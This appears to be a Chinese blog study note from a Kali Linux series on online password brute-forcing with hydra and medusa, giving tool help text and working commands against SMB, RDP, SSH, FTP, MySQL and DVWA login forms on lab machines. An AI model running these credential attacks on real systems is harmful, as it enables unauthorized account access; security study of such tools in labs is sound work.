Kali linux 学习笔记(六十)密码破解——在线破解(hydra、Medusa ) 2020.4.4

前言

在线破解
把字典里的逐个往服务器里去试
主要学习hydra和medusa

1、hydra

九头蛇(工具名字真的一个比一个有趣)
速度快、功能强大、稳定性差

hydra -hh
Options:
  -R        restore a previous aborted/crashed session
  -I        ignore an existing restore file (don't wait 10 seconds)
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y        disable use of symbols in bruteforce, see above
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
  -w / -W TIME  wait time for a response (32) / between connects per thread (0)
  -c TIME   wait time per login attempt over all threads (enforces -t 1)
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode 
  -O        use old SSL v2 and v3
  -q        do not print messages about connection errors
  -U        service module usage details
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)
Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)
Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

Windows 密码破解

hydra -l administrator -P pass.lst smb://1.1.1.1/admin$ -vVd #smb协议比较好破解
hydra -l administrator -P pass.lst rdp://1.1.1.1 -t 1 -vV #rdp协议不稳定,容易漏判


开启win2003虚拟机
IP为192.168.1.118
在kali里

nmap -p 192.168.1.118 #扫描端口
#发现445,3389
hydra -l administrator -P john.txt smb://192.168.1.118 -vV
#破解成功,当然这里是设置密码时已经确认过密码在john里有

Linux 密码破解

hydra -l root -P john.txt ssh://192.168.1.113 -vV #这里以metasploitable为目标机

其他服务密码破解

hydra -L user.lst -P pass.lst ftp://192.168.1.113 -s 2121 -e nsr -o p.txt -t 64 -vV #最大并发64

图形化界面

xhydra

HTTP表单身份认证

hydra -l admin -P pass.lst 1.1.1.1 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=L in:S=index.php" -V
hydra -l admin -P pass.lst 1.1.1.1 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=L in:Login Failed" -V 
/foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H =X-Foo: Foo
#C:先访问指定页面取得cookie
#H:指定http头
#S:使用SSL连接

pw-inspector

Hydra 小工具
按长度和字符集筛选字典

pw-inspector -i /usr/share/wordlists/nmap.lst -o p1.lst -l 
pw-inspector -i /usr/share/wordlists/nmap.lst -o P2.lst -u
pw-inspector -i /usr/share/wordlists/nmap.lst -o P2.lst -u -m 3 -M 5 #-m和-M指定最小和最大长度

2、Medusa

  • 稳定性好
  • 速度控制得当
  • 基于线程
  • 支持模块少于hydra(不支持RDP)
  • WEB-Form 支持存在缺陷

破解windows密码

# -M 指定模块名,使用 -d 可以查询
medusa -M smbnt -h 192.168.1.118 -u administrator -P john.txt -e ns -F -v 3 #-v指定细化程度

破解Linux密码

# 使用 ssh 模块
medusa -M ssh -h 192.168.1.113 -u root -P pass.txt -e ns –F

其他服务密码破解

medusa -M mysql -h 192.168.1.1132 -u root -P pass.txt -e ns -F

表单身份认证

medusa -h 1.1.1.1 -u admin -P pass.lst -M web-form -m FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-DATA:"post?user=username&pass=password&Login=Login"
#-n:非默认端口
#-s:使用SSL连接
#-T:并发主机数

结语

没什么好说的
主要看重字典的质量
一个个试就完事了

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 技术黑板 设计师:CSDN官方博客 返回首页